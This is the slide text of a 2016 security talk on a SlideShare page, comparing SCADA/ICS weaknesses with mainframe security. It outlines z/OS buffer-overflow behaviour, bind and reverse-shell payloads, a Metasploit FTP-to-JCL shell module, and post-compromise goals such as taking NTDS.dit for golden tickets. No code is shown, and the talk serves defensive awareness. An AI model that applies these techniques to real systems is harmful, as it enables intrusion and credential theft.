SlideShare a Scribd company logo

A Stuxnet for Mainframes

Cheryl Biswas
Cheryl Biswas

You say SCADA, I say … mainframes. There are some remarkable - and scary - parallels between the worlds of SCADA ICS and mainframes. Each system is critical to our lives. Their worlds are insular, proprietary, and seemingly shut-off to everyone else. Except for when they aren’t. Extrapolate the future of security for mainframes based on the challenges and failures of SCADA ICS as it has evolved from sequestered to connected. SCADA serves as a cautionary tale for securing mainframes against acts of God, nature and man in this scenario of a Stuxnet for Mainframes.

Technology
1 of 83
Download to read offline
A STUXNET FOR MAINFRAMES
Cheryl Biswas • Security researcher/analyst Threat Intel • APTs, Mainframes, ICS SCADA, Shadow IT, StarTrek • BSidesLV, Circle City, BSidesT0, SecTor, Hackfest, TiaraCon • https://whitehatcheryl.wordpress.com • Twitter: @3ncr1pt3d DISCLAIMER: The views represented here are solely her own and not those of her employers, past or present. 11/4/2016@3ncr1pt3d A Stuxnet For Mainframes
HEAD IN THE SAND DEFENCE
YOU SAY SCADA WE SAY … MAINFRAMES
MOM!! THE INTERNET IS BROKEN
INTRO In the beginning There were mainframes And it was good.
Then came Scada. And it was good too.
CONGRATULATIONS! IT’S A ... PLC
BUT THEN CAME ...
WHAT IS SCADA
I CAN’T LIVE ... IF LIVING IS WITHOUT YOU
DOES NOT PLAY WELL WITH OTHERS
WHAT ARE MAINFRAMES?
MAINFRAMES … RIGHT?
THESE ARE NOT THE MAINFRAMES YOU’RE LOOKING FOR
THIS AIN’T YOUR GRANDMA’S MAINFRAME
MAINFRAMES - BUILT TO LAST • High Availability • Longevity • Virtualization • The ability to offload to separate engines • Backward compatibility with older software • Massive Throughput https://en.wikipedia.org/wiki/Mainframe_computer
@3ncr1pt3d A Stuxnet For Mainframes 11/4/2016
SCADA MAINFRAME ❏ Culture ❏ Security Approach ❏ Perceptions ❏ Built to Last ❏ Closed off ❏ Does not play well with others ❏ Culture ❏ Security Approach ❏ Perceptions ❏ Built to Last ❏ Closed off ❏ Does not play well with others
Innovation Disruption Would you like some security with that?
SECURITY BASICS WE KEEP GETTING WRONG ❏ Passwords ❏ Encryption ❏ Access ❏ Patching http://blog.senr.io/blog/unique-snowfla kes-or-ubiquitous-tech-the-truth-behind -the-industrial-internet-of-things-iiot
ICS / SCADA - WHAT HAVE WE LEARNED?
"NONE OF OUR SCADA OR ICS EQUIPMENT IS ACCESSIBLE FROM THE INTERNET." O RLY?
PROJECT SHINE 1,000,000 SCADA ICS DEVICES FOUND ONLINE
SCADA ATTACK VECTORS
SCADA ATTACKS Malicious Trojan http://www.risidata.com/Database
SCADA ATTACKS Stolen equipment http://www.risidata.com/Database
SCADA ATTACKS Social Engineering http://www.risidata.com/Database
SCADA - JUMPING AIR GAPS • Designed for underwater communication • Near ultrasonic frequency • Remote key logging for multiple hops http://www.jocm.us/index.php?m=content&c=index&a=show&c atid=124&id=600
MAINFRAMES & SCADA - THE LINKS • Similar in Culture • Lack of security • Perceived as secure • “Air Gapped” • “See no evil” – cuz you don’t see it if you aren’t looking
BUT IT’S AIR GAPPED “Mainframe modernization or exposing the classic system of record data to new services means that the data is no longer isolated on the mainframe – the world is now “unknown, unknown.” We have lost sight and control of where the data is going the minute we try to harness mainframe data for other purposes than batch or transaction applications.” zOS Expert
MAINFRAME - LACK OF ATTACK DATA Because … What you don’t see won’t hurt you
CULTURE http://mainframed767.tumblr.com/post/79167015212/please-dont -post-on-mainframe-forums?is_related_post=1
MAINFRAME EXPLOIT RESEARCH
MAINFRAME - EXPLOIT RESEARCH Bigendiansmalls https://www.bigendiansmalls.com/category/security/exploit-develop ment/
MAINFRAME - NMAP Can now detect Mainframe ports Mainframe banners are not static More accessible to others for hacking http://mainframed767.tumblr.com/post/132669411918/mainframes-a nd-nmap-together-at-last http://mainframed767.tumblr.com/post/47105571997/nmap-script-to -grab-mainframe-screens
MAINFRAMES - BIND SHELLCODE Mainframe assembler EBCDIC to ASCII converter Connect with NetCat https://www.bigendiansmalls.com/mainframe-bind-shell-source-code / ASCII TO EBCDIC ASCII TO EBCDIC EBCDIC TO ASCII
LETS GET TECHNICAL
MAINFRAMES - STACK BUT DIFFERENT ▪Mainframe prologue creates Dynamic Storage Area ▪Points to next free byte on the stack used ▪Does not subtract from ESP to allocate space ▪Register used as a stack pointer ▪Not forced to do so. https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-and cease-and-desist-letters-guest-post-2/
ALLOCATION OF MEMORY - FUNCTION PROLOGUE 0x8012343 0x8012344 Function Called 0x8012345 - SFP IP EBP MAIN()ESP EBP SFPESP +
ALLOCATION MEMORY - FUNCTION PROLOGUE 0x8012345 0x8012344 Function Called IP Allocated Memory EBP -28ESPMAIN() FUNCTIO N() SFPESP +
ALLOCATION MEMORY - FUNCTION EPILOGUIE IP EBP MAIN()ESP EBP SFP ESP + SFP
ALLOCATION MEMORY - DSA PROLOGUE 0x8012345 0x8012344 Function “Called” IP Dynamic Storage Area MAIN() Pointer to original DS DSA NOT STACK Save Area
Not gonna happen HOW TO EXPLOIT - STRING EXPLOITATION != WINAlways aware of length StringStringStringStrin gString Length StringStringStrin gStri Length https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-an d-cease-and-desist-letters-guest-post-2/ AAAAAAAAAA
MAINFRAMES - UNIQUE TO EXPLOIT S0C1 Exception http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zo s-le AAAAAAAAAAAAAAA AAAAAA Memory containing Data OPCODES OPCODE does not exist No size checking AAAAA AAA Overflow causes execution to branch to another memory location
MAINFRAMES - UNIQUE TO EXPLOIT S0C1 Exception http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zo s-le DSA Level 0 DSA 1 Returns to DS 0 DSA Level 0 DSA 2 DSA Level 1 Register 14 = RP
MAINFRAMES - UNIQUE TO EXPLOIT Globally addressed arrays S0C1 Exception http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zo s-le DSA Level 0 DSA 2DSA Level 1 Register 14 = RP DSA 2DSA 1 DSA 3 Procedure returns to Level 1 Actually executes code in DSA2
MAINFRAMES - INSECURITY OF MEMORY Memory not more secure than Windows or Unix. No “DEP” No strict ASLR http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zo s-le
ACCESSIBLE TO YOU!
FTP EXPLOIT EXPLOIT/MAINFRAME/FTP/FTP_JCL_CREDS
MAINFRAME - FIRST METASPLOIT MODULE Poorly configured FTP server. FTP -> Shell https://www.bigendiansmalls.com/a-logical-first-step/
FTP METASPLOIT MODULE ARCH_CMD Executes a command, or uses a command to give a shell Platform: Mainframe Uses the Mainframe payloads of metasploit Target Automatic Only works with IBM FTP CS V.R. Requires Credentials Credentials allow a file to be uploaded Debugging enabled Can enable Verbose and FTPdebug https://www.bigendiansmalls.com/a-logical-first-step/ https://www.rapid7.com/db/modules/exploit/mainframe/ftp/
FTP METASPLOIT MODULE Checks Banner If banner correct, logs in and uploads file File is uploaded as JOB & executes https://www.bigendiansmalls.com/a-logical-first-step/@3ncr1pt3d A Stuxnet For Mainframes 11/4/2016
GENERIC JCL TEST FOR MAINFRAME EXPLOITS This can be used as a template for other JCL based payloads https://www.rapid7.com/db/modules/payload/cmd/mainframe/generic_j clhttps://www.bigendiansmalls.com/a-logical-first-step/
Z/OS (MVS) COMMAND SHELL, REVERSE TCP Creates a reverse shell.This implementation does not include ebcdic character translation, so a client with translation capabilities is required. MSF handles this automatically. https://www.rapid7.com/db/modules/exploit/mainframe/ftp/ft p_jcl_creds https://www.bigendiansmalls.com/mainframe-bind-shell-sourc
GENERIC COMMAND SHELL Connect back to attacker and spawn a command shell
HOW THE MIGHTY FALL
BIGENDIAN POC 11/4/2016@3ncr1pt3d A Stuxnet For Mainframes
STUXNET - SCADA
SCADA - STUXNET • Air Gap bypass • APT • C2 • Self erasing • Specific to system it wants • Nation State
SCADA -THE THREAT IS REAL • Dec 2015 Powergrid attack in Ukraine • March 2016 Ransomware hits US power company in Michigan • June 2016 Irongate Targetted ICS malware in testing stage
CRYSTAL BALL GAZING
We’re here to say history doesn’t need to repeat itself. Especially not when we know how dire the outcome could be. Scada gives us the lessons we need to learn from and apply to mainframe security. The question now is - will we do it?
THE KEYS TO THE KINGDOM ▪ Obtain Domain admin level creds ▪ Gain a copy of NTDS.dit for Kerberos golden tickets to move freely ▪ Identify the back up and recovery systems, including DRP ▪ Identify the critical data and services. Mission critical ▪ Identify messaging servers ▪ Find and compromise application distribution platforms
HOW TO GET YOUR FEET WET Researchers to Research • https://www.bigendiansmalls.com/ • http://mainframed767.tumblr.com/ • Mainframe Assembly • locallyhttp://www.cbttape.org/ftp/asmbook/alnv200.pdf
HOW TO GET YOUR FEET WET • Virtualization software to play • http://www.bsp-gmbh.com/turnkey/ • http://mvs380.sourceforge.net/ • https://www.tripwire.com/state-of-security/security-data-protection/cyber-secur ity/mainframe-insecuritites-or-hack-the-gibson-no-really/

Recommended

Mission Critical Security in a Post-Stuxnet World Part 1
Mission Critical Security in a Post-Stuxnet World Part 1Mission Critical Security in a Post-Stuxnet World Part 1
Mission Critical Security in a Post-Stuxnet World Part 1Byres Security Inc.
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723Iftach Ian Amit
 
I Heart Stuxnet
I Heart StuxnetI Heart Stuxnet
I Heart StuxnetGil Megidish
 
Stuxnet - Case Study
Stuxnet - Case StudyStuxnet - Case Study
Stuxnet - Case StudyAmr Thabet
 
Stuxnet
StuxnetStuxnet
Stuxnetbueno buono good
 
Stuxnet worm
Stuxnet wormStuxnet worm
Stuxnet wormsommerville-videos
 
Mission Critical Security in a Post-Stuxnet World Part 2
Mission Critical Security in a Post-Stuxnet World Part 2Mission Critical Security in a Post-Stuxnet World Part 2
Mission Critical Security in a Post-Stuxnet World Part 2Byres Security Inc.
 

Recommended

Mission Critical Security in a Post-Stuxnet World Part 1
Mission Critical Security in a Post-Stuxnet World Part 1Mission Critical Security in a Post-Stuxnet World Part 1
Mission Critical Security in a Post-Stuxnet World Part 1Byres Security Inc.
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723Iftach Ian Amit
 
I Heart Stuxnet
I Heart StuxnetI Heart Stuxnet
I Heart StuxnetGil Megidish
 
Stuxnet - Case Study
Stuxnet - Case StudyStuxnet - Case Study
Stuxnet - Case StudyAmr Thabet
 
Stuxnet
StuxnetStuxnet
Stuxnetbueno buono good
 
Stuxnet worm
Stuxnet wormStuxnet worm
Stuxnet wormsommerville-videos
 
Mission Critical Security in a Post-Stuxnet World Part 2
Mission Critical Security in a Post-Stuxnet World Part 2Mission Critical Security in a Post-Stuxnet World Part 2
Mission Critical Security in a Post-Stuxnet World Part 2Byres Security Inc.
 
The World's First Cyber Weapon - Stuxnet
The World's First Cyber Weapon - StuxnetThe World's First Cyber Weapon - Stuxnet
The World's First Cyber Weapon - StuxnetSean Xie
 
Stuxnet - More then a virus.
Stuxnet - More then a virus.Stuxnet - More then a virus.
Stuxnet - More then a virus.Hardeep Bhurji
 
Stuxnet flame
Stuxnet flameStuxnet flame
Stuxnet flameSantosh Khadsare
 
Stuxnet
StuxnetStuxnet
StuxnetSymantec
 
How stuxnet spreads – a study of infection paths in best practice systems
How stuxnet spreads – a study of infection paths in best practice systemsHow stuxnet spreads – a study of infection paths in best practice systems
How stuxnet spreads – a study of infection paths in best practice systemsYury Chemerkin
 
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)INSIGHT FORENSIC
 
Hacker bootcamp
Hacker bootcampHacker bootcamp
Hacker bootcampGregory Hanis
 
Building HMI with VB Tutorial [1998]
Building HMI with VB Tutorial [1998]Building HMI with VB Tutorial [1998]
Building HMI with VB Tutorial [1998]Sarod Paichayonrittha
 
Malware freak show
Malware freak showMalware freak show
Malware freak showsr1nu
 
Troopers15 Lightning talk: VMI & DRAKVUF
Troopers15 Lightning talk: VMI & DRAKVUFTroopers15 Lightning talk: VMI & DRAKVUF
Troopers15 Lightning talk: VMI & DRAKVUFTamas K Lengyel
 
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat Security Conference
 
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...CanSecWest
 
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelXPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelThe Linux Foundation
 
Cloud Security with LibVMI
Cloud Security with LibVMICloud Security with LibVMI
Cloud Security with LibVMITamas K Lengyel
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIMAlienVault
 
Offline attacks-and-hard-disk-encription
Offline attacks-and-hard-disk-encriptionOffline attacks-and-hard-disk-encription
Offline attacks-and-hard-disk-encriptionmalvvv
 
Malware Collection and Analysis via Hardware Virtualization
Malware Collection and Analysis via Hardware VirtualizationMalware Collection and Analysis via Hardware Virtualization
Malware Collection and Analysis via Hardware VirtualizationTamas K Lengyel
 
Linux Security
Linux SecurityLinux Security
Linux Securitynayakslideshare
 
31c3 Presentation - Virtual Machine Introspection
31c3 Presentation - Virtual Machine Introspection31c3 Presentation - Virtual Machine Introspection
31c3 Presentation - Virtual Machine IntrospectionTamas K Lengyel
 
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar Santhosh Kumar
 
Duqu: il nuovo Stuxnet?
Duqu: il nuovo Stuxnet?Duqu: il nuovo Stuxnet?
Duqu: il nuovo Stuxnet?Symantec Italia
 
The Stuxnet Virus FINAL
The Stuxnet Virus FINALThe Stuxnet Virus FINAL
The Stuxnet Virus FINALNicholas Poole
 

More Related Content

What's hot

The World's First Cyber Weapon - Stuxnet
The World's First Cyber Weapon - StuxnetThe World's First Cyber Weapon - Stuxnet
The World's First Cyber Weapon - StuxnetSean Xie
 
Stuxnet - More then a virus.
Stuxnet - More then a virus.Stuxnet - More then a virus.
Stuxnet - More then a virus.Hardeep Bhurji
 
How stuxnet spreads – a study of infection paths in best practice systems
How stuxnet spreads – a study of infection paths in best practice systemsHow stuxnet spreads – a study of infection paths in best practice systems
How stuxnet spreads – a study of infection paths in best practice systemsYury Chemerkin
 
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)INSIGHT FORENSIC
 
Building HMI with VB Tutorial [1998]
Building HMI with VB Tutorial [1998]Building HMI with VB Tutorial [1998]
Building HMI with VB Tutorial [1998]Sarod Paichayonrittha
 
Malware freak show
Malware freak showMalware freak show
Malware freak showsr1nu
 
Troopers15 Lightning talk: VMI & DRAKVUF
Troopers15 Lightning talk: VMI & DRAKVUFTroopers15 Lightning talk: VMI & DRAKVUF
Troopers15 Lightning talk: VMI & DRAKVUFTamas K Lengyel
 
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat Security Conference
 
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...CanSecWest
 
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelXPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelThe Linux Foundation
 
Cloud Security with LibVMI
Cloud Security with LibVMICloud Security with LibVMI
Cloud Security with LibVMITamas K Lengyel
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIMAlienVault
 
Offline attacks-and-hard-disk-encription
Offline attacks-and-hard-disk-encriptionOffline attacks-and-hard-disk-encription
Offline attacks-and-hard-disk-encriptionmalvvv
 
Malware Collection and Analysis via Hardware Virtualization
Malware Collection and Analysis via Hardware VirtualizationMalware Collection and Analysis via Hardware Virtualization
Malware Collection and Analysis via Hardware VirtualizationTamas K Lengyel
 
31c3 Presentation - Virtual Machine Introspection
31c3 Presentation - Virtual Machine Introspection31c3 Presentation - Virtual Machine Introspection
31c3 Presentation - Virtual Machine IntrospectionTamas K Lengyel
 
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar Santhosh Kumar
 

What's hot (20)

The World's First Cyber Weapon - Stuxnet
The World's First Cyber Weapon - StuxnetThe World's First Cyber Weapon - Stuxnet
The World's First Cyber Weapon - Stuxnet
 
Stuxnet - More then a virus.
Stuxnet - More then a virus.Stuxnet - More then a virus.
Stuxnet - More then a virus.
 
Stuxnet flame
Stuxnet flameStuxnet flame
Stuxnet flame
 
Stuxnet
StuxnetStuxnet
Stuxnet
 
How stuxnet spreads – a study of infection paths in best practice systems
How stuxnet spreads – a study of infection paths in best practice systemsHow stuxnet spreads – a study of infection paths in best practice systems
How stuxnet spreads – a study of infection paths in best practice systems
 
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
 
Hacker bootcamp
Hacker bootcampHacker bootcamp
Hacker bootcamp
 
Building HMI with VB Tutorial [1998]
Building HMI with VB Tutorial [1998]Building HMI with VB Tutorial [1998]
Building HMI with VB Tutorial [1998]
 
Malware freak show
Malware freak showMalware freak show
Malware freak show
 
Troopers15 Lightning talk: VMI & DRAKVUF
Troopers15 Lightning talk: VMI & DRAKVUFTroopers15 Lightning talk: VMI & DRAKVUF
Troopers15 Lightning talk: VMI & DRAKVUF
 
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
 
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
 
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelXPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
 
Cloud Security with LibVMI
Cloud Security with LibVMICloud Security with LibVMI
Cloud Security with LibVMI
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
 
Offline attacks-and-hard-disk-encription
Offline attacks-and-hard-disk-encriptionOffline attacks-and-hard-disk-encription
Offline attacks-and-hard-disk-encription
 
Malware Collection and Analysis via Hardware Virtualization
Malware Collection and Analysis via Hardware VirtualizationMalware Collection and Analysis via Hardware Virtualization
Malware Collection and Analysis via Hardware Virtualization
 
Linux Security
Linux SecurityLinux Security
Linux Security
 
31c3 Presentation - Virtual Machine Introspection
31c3 Presentation - Virtual Machine Introspection31c3 Presentation - Virtual Machine Introspection
31c3 Presentation - Virtual Machine Introspection
 
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
 

Viewers also liked

The Stuxnet Virus FINAL
The Stuxnet Virus FINALThe Stuxnet Virus FINAL
The Stuxnet Virus FINALNicholas Poole
 
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)INSIGHT FORENSIC
 
Cours CyberSécurité - Concepts Clés
Cours CyberSécurité - Concepts ClésCours CyberSécurité - Concepts Clés
Cours CyberSécurité - Concepts ClésFranck Franchin
 
Sécurité des systèmes d'information
Sécurité des systèmes d'informationSécurité des systèmes d'information
Sécurité des systèmes d'informationFranck Franchin
 
La securité informatique - Etat des Lieux - Nov. 2016
La securité informatique - Etat des Lieux - Nov. 2016La securité informatique - Etat des Lieux - Nov. 2016
La securité informatique - Etat des Lieux - Nov. 2016Olivier DUPONT
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatiqueoussama Hafid
 

Viewers also liked (9)

Duqu: il nuovo Stuxnet?
Duqu: il nuovo Stuxnet?Duqu: il nuovo Stuxnet?
Duqu: il nuovo Stuxnet?
 
The Stuxnet Virus FINAL
The Stuxnet Virus FINALThe Stuxnet Virus FINAL
The Stuxnet Virus FINAL
 
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
(120715) #fitalk the era of cyber sabotage and warfare (case study - stuxnet)
 
Cours CyberSécurité - Concepts Clés
Cours CyberSécurité - Concepts ClésCours CyberSécurité - Concepts Clés
Cours CyberSécurité - Concepts Clés
 
Sécurité des systèmes d'information
Sécurité des systèmes d'informationSécurité des systèmes d'information
Sécurité des systèmes d'information
 
Cyber Sécurité : Connaître son adversaire pour mieux parer les attaques
Cyber Sécurité : Connaître son adversaire pour mieux parer les attaquesCyber Sécurité : Connaître son adversaire pour mieux parer les attaques
Cyber Sécurité : Connaître son adversaire pour mieux parer les attaques
 
Principes de bon sens pour une gouvernance cyber sécurité efficiente
Principes de bon sens pour une gouvernance cyber sécurité efficientePrincipes de bon sens pour une gouvernance cyber sécurité efficiente
Principes de bon sens pour une gouvernance cyber sécurité efficiente
 
La securité informatique - Etat des Lieux - Nov. 2016
La securité informatique - Etat des Lieux - Nov. 2016La securité informatique - Etat des Lieux - Nov. 2016
La securité informatique - Etat des Lieux - Nov. 2016
 
Sécurité informatique
Sécurité informatiqueSécurité informatique
Sécurité informatique
 

Similar to A Stuxnet for Mainframes

Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...arnaudsoullie
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020Jose Palanco
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoCodemotion
 
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...Codemotion
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяEkaterina Melnik
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NamePositive Hack Days
 
Stop expecting magic fairy dust: Make apps secure by design
Stop expecting magic fairy dust: Make apps secure by designStop expecting magic fairy dust: Make apps secure by design
Stop expecting magic fairy dust: Make apps secure by designPatrick Walsh
 
Drupal Camp Atlanta 2011 - Drupal Security
Drupal Camp Atlanta 2011 - Drupal SecurityDrupal Camp Atlanta 2011 - Drupal Security
Drupal Camp Atlanta 2011 - Drupal SecurityMediacurrent
 
How We Learned To Love The Data Center Operating System
How We Learned To Love The Data Center Operating SystemHow We Learned To Love The Data Center Operating System
How We Learned To Love The Data Center Operating Systemsaulius_vl
 
Attacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAttacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAleksandr Timorin
 
Drupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurityDrupal Camp Bristol 2017 - Website insecurity
Drupal Camp Bristol 2017 - Website insecurityGeorge Boobyer
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey GordeychikCODE BLUE
 
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summerDEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summer
DEF CON 27 - D4KRM4TTER MIKE SPICER - I know what you did last summerFelipe Prado
 
D1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via smsD1 t1 t. yunusov k. nesterov - bootkit via sms
D1 t1 t. yunusov k. nesterov - bootkit via smsqqlan
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsPriyanka Aash
 
Deep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slidesDeep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slidesortegaalfredo
 
Black ops of tcp2005 japan
Black ops of tcp2005 japanBlack ops of tcp2005 japan
Black ops of tcp2005 japanDan Kaminsky
 
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligenceOrder vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligencePriyanka Aash
 
Securing Rails
Securing RailsSecuring Rails
Securing RailsAlex Payne
 
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinRv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinreconvillage
 

Similar to A Stuxnet for Mainframes (20)

Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
IoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco RomanoIoT exploitation: from memory corruption to code execution by Marco Romano
IoT exploitation: from memory corruption to code execution by Marco Romano
 
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...IoT exploitation: from memory corruption to code execution - Marco Romano - C...
IoT exploitation: from memory corruption to code execution - Marco Romano - C...
 
SCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имяSCADA Strangelove: взлом во имя
SCADA Strangelove: взлом во имя
 
SCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the NameSCADA Strangelove: Hacking in the Name
SCADA Strangelove: Hacking in the Name
 
Stop expecting magic fairy dust: Make apps secure by design
